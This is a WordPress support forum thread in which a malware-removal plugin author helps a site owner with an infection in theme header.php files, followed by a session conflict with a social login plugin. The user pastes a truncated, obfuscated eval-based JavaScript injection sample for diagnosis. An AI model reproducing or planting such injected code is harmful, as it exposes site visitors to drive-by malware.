Plugin Author
Eli
(@scheeeli)
This looks like a new threat that is not in my definitions yet. I you would be willing to give me WP Admin access to one of your infected sites I will find this new threat and add it to my definition update so that it can be automatically removed.
You can email the login in directly to me: eli at gotmls dot net
Aloha, Eli
i just solve it with very traditional way, i download every folder from ftp to my desktop and my pc antivirus do detecting job …
base on my desktop antivirus :
virus name : JS/Expack.CM.3
injected in all my theme header.php files,
hopefully i really solve it, u still need access to take a lot ?
thanks
suspected code provide by google webmaster :
<script type="text/javascript" language="javascript" >
ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}i
f(!a){try{--e("doc"+"ument")["bod"+z]}catch(q){a2="_";sa=0xa
-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_3
1_28_83_15_12_28_7e_69_7a_28_7c_7a_6c_79_7a_28_45_28_6c_77_6
b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_3
0_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7c_7a_6c_79_7
a_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7c_6a_69_36_7
2_78_37_78_70_77_7c_77_37_7c_7a_69_6e_36_78_70_78_2f_43_15_1
2_28_7c_7a_6c_79_7a_36_7b_7c_81_74_6d_36_78_77_7b_71_7c_71_7
7_76_28_45_28_2f_69_6a_7b_77_74_7d_7c_6d_2f_43_15_12_28_7c_7
a_6c_79_7a_36_7b_7c_81_74_6d_36_6a_77_7a_6c_6d_7a_28_45_28_2
f_38_2f_43_15_12_28_7c_7a_6c_79_7a_36_7b_7c_81_74_6d_36_70_6
or u can visit here for detail in their cache system :
http://sitecheck.sucuri.net/results/douglasyeap.pgpropertyagent.com/
the main site already rescan without issue now ..
Plugin Author
Eli
(@scheeeli)
I would still like access to an infected site so I can see the infection in-place and test my own removal code. If you don’t have a site I can login to can you send me one of your infected hearder.php files?
i don’t have the files anymore (cause my pc block it).
I add and create you as my site admin now, remember my site is wpms π
account created π
email you ftp access too π
Plugin Author
Eli
(@scheeeli)
Thanks for the access but it looks like you have already cleaned the infection out of your header. Do you have any sites that are still infected with this threat?
unfortunately no (lucky me) …
I think the problem should be on scanning not db, cause i recall your scanner detect the virus but only one files header.php (i have 4 header.php), but that header.php detect is the only theme that not using at all ….
Plugin Author
Eli
(@scheeeli)
Thanks for working with me on this and giving me access to your site. Based on the malicious code snippet you posted, and the files in your quarantine, I do think this malware is in my definitions already.
Please keep a close eye on your site for a few days to make sure the infection does not come back. If you do get re-infected, and hope you don’t, but if you do, please let me know right away and I will look for the source of the infection too.
Aloha, Eli
seem like you plugin is conflict with wp social login.
i try diagnose and think this is the issue :
cookie save here /public_html/wp-content/plugins/gotmls/images/
Plugin Author
Eli
(@scheeeli)
WordPress does not handle sessions well, and some servers I’ve found don’t even have a session path, so I have added this to the top of my gotmls/images/index.php file in my plugin:
if(!session_save_path()) session_save_path(dirname(__FILE__).'/');
If this line is infact causing an issue I will have to look for another way to fix the no-session issue. Can you rem out that line and let me know if it solves the issue?
Also, what are the symptoms you are experiencing due to this conflict?
symptoms :
when click on social login, new screen pop up -> redirect to this page : http://pgpropertyagent.com/wp-content/plugins/wordpress-social-login/hybridauth/?hauth.start=Live&hauth.time=1374262225
with your plugin -> You cannot access this page directly.
without your plugin -> redirect to social network API or login page.
below is my website info with and without your plugin :
without (different part) :
SESSION: Enabled
SESSION:WSL WordPress Social Login 2.1.4
SESSION:NAME: PHPSESSID
COOKIE PATH: /
SAVE PATH:
USE COOKIES: On
USE ONLY COOKIES: Off
with your plugin :
SESSION: Enabled
SESSION:WSL WordPress Social Login 2.1.4
SESSION:NAME: PHPSESSID
COOKIE PATH: /
SAVE PATH: /home/xxx/domains/domain.com/public_html/wp-content/plugins/gotmls/images/
USE COOKIES: On
USE ONLY COOKIES: Off
hope this help ..
Plugin Author
Eli
(@scheeeli)
That message is from /public_html/wp-content/plugins/wordpress-social-login/hybridauth/Hybrid/Endpoint.php
I was getting that error “You cannot access this page directly” with or without my plugin enabled. I tried remming out that first line of my plugin that changes the session path and nothing seems any different.
Can you show me a working redirect without my plugin enabled so that I can see the difference?
u can visit my site, i just try, is working now π
Plugin Author
Eli
(@scheeeli)
When I go to:
http://pgpropertyagent.com/wp-content/plugins/wordpress-social-login/hybridauth/?hauth.start=Live&hauth.time=1374262225
I still get:
“You cannot access this page directly.”
What URL can I use to see it working like you see it?
